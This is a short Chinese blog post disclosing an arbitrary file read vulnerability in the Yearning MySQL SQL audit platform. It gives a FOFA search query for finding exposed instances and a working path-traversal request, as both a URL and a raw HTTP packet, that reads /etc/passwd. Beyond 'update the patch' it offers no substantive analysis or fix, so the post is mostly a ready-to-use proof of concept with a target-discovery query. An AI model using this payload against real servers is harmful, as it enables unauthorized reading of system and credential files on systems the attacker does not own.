Yearning存在任意文件读取漏洞


前言

Yearning MYSQL SQL语句审核平台。提供查询审计,SQL审核,SQL回滚,自定义工作流等多种功能。该平台存在任意文件读取漏洞。


声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


一、Yearning简介

Yearning MYSQL SQL语句审核平台。提供查询审计,SQL审核,SQL回滚,自定义工作流等多种功能。

二、漏洞描述

Yearning MYSQL SQL语句审核平台。提供查询审计,SQL审核,SQL回滚,自定义工作流等多种功能。该平台存在任意文件读取漏洞。

三、影响版本

Yearning MYSQL SQL语句审核平台
在这里插入图片描述

四、漏洞复现

FOFA:app="Yearning"

漏洞链接:http://127.0.0.1/front/%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c…%5c/etc/passwd

漏洞数据包:

GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive

在这里插入图片描述

五、修复建议

更新补丁

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-01-21 00:52:02       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-01-21 00:52:02       100 阅读
  3. 在Django里面运行非项目文件

    2024-01-21 00:52:02       82 阅读
  4. Python语言-面向对象

    2024-01-21 00:52:02       91 阅读

热门阅读

  1. 【力扣刷题练习】103. 二叉树的锯齿形层序遍历

    2024-01-21 00:52:02       71 阅读
  2. Webpack5入门到原理3:基本配置

    2024-01-21 00:52:02       60 阅读
  3. python期末:常见模块的使用及计算生态

    2024-01-21 00:52:02       51 阅读
  4. 导出zoedepth的onnx模型并基于gradio实现在线部署

    2024-01-21 00:52:02       68 阅读
  5. Spring MVC学习之——上传文件

    2024-01-21 00:52:02       64 阅读
  6. 力扣54. 螺旋矩阵

    2024-01-21 00:52:02       68 阅读